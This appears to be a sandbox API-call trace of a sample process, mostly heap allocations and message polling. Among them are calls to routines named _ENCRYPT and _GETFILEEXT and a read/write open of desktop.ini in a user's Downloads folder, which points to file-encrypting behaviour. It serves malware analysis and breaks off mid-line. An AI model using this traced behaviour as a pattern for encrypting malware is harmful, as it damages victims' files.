[0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.619] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0180.619] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.620] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.620] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0180.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0180.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0180.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0180.620] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0180.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0180.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0180.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0180.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0180.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0180.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0180.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.622] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0180.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0180.623] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.623] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0180.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0180.624] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.625] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0180.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0180.625] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd648 [0180.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd648, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0180.626] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0180.629] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.629] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0180.629] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0180.629] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0180.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.630] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0180.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0180.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0180.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0180.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0180.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba390, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0180.631] FreeLibrary (hLibModule=0x75990000) returned 1 [0180.631] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0180.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0180.631] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0180.631] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0180.631] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0180.631] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0180.631] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0180.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0180.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0180.632] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0180.632] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0180.632] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0180.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0180.632] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.632] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.634] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.634] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0180.635] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0180.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.635] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0180.635] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 